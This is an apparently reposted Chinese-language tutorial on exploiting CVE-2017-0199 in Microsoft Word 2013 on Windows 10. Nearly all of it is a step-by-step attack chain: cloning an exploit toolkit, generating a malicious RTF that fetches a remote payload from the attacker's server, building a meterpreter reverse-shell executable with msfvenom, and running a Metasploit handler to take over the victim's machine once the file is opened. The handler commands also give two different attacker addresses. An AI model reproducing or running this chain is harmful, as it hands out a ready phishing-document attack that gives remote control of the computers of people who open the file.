windows 10上利用Microsoft RTF文件(CVE-2017-0199)進行攻擊


Microsoft Word下的惡意RTF文件容易被收到攻擊,在本文中,我們使用python腳本對Microsoft Word 2013進行oday攻擊演示,該腳本會生成惡意的.rtf文件,並提供目標系統的篡改會話。
利用工具包CVE-2017-0199 - v2.0是一個很有用的python利用腳本,它提供了一種快速有效的利用Microsoft RTF RCE進行攻擊的方式。它可以生成惡意的RTF文件,並將metasploit 下meterpreter反彈shell有效載荷提供給攻擊者,而不需要任何復雜的配置。
測試環境:
攻擊者:Kali Linux(ip:192.168.1.24)
目標:Windows 10( Microsoft Word 2013 )
1.打開您的kali Linux的shell終端,然后輸入以下命令生成一個惡意rtf:

git clone https://github.com/bhdresh/CVE-2017-0199.git


此命令將運行一個python腳本來生成富文本格式的有效載荷,其中-M用於生成rtf文件,-w用於生成rtf文件的名稱,即sales.rtf, -u為攻擊者的IP地址或域名。

cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc



以下截圖中的命令輸出生成的惡意.rtf文件即sales.rtf文件可以在系統中找到。在我們將這個文件發送給被攻擊者之前,我們需要將它嵌套到任何后門文件中,以便我們可以建立與被攻擊者的反向連接。



2.在新終端shell上,使用msfvenom來生成一個exe的有效載荷,以便進行攻擊。其命令如下:

Msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.1.24 lport = 4444 -f exe> /root/Desktop/raj.exe



3.現在將raj.exe和sales.rtf移動到/var/www/html中


4.現在鍵入以下命令,將raj.exe與sales.rtf進行合並。然后,啟動多個處理程序以反向連被入侵者。其命令如下:
python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe



5.當受害者打開sales.rtf文件時,攻擊者將會在metasploite框架內收到反彈shell

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

 

或者

msf> use multi/handler
msf exploit(handler )> set payload windows / meterpreter / reverse_tcp
msf exploit(handler )> set lhost 192.168.1.24
msf exploit(handler )> set lport 4444
msf exploit(handler )> exploit
syspreter> sysinfo

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM